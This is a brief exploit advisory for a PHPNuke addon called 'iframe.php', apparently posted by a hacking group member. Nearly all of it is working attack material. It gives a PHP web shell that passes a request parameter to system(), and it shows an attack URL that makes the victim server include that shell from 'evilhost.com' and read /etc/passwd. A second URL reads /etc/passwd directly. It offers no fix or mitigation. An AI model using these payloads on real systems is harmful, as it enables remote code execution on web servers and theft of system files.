Bugs in the PHPNuke Addon "iframe.php"

Remote Code Execution:

Example:

file.txt:

#############
<?
system($cmd);
?>
#############

Attacker URL:
http://victim.com/iframe.php?file=http://evilhost.com/file.txt&cmd=cat%20/etc/passwd


Remote File Retrieving:

Example:

http://victim.com/iframe.php?file=/etc/passwd


Zero X member of www.lobnan.de and www.lostkey.org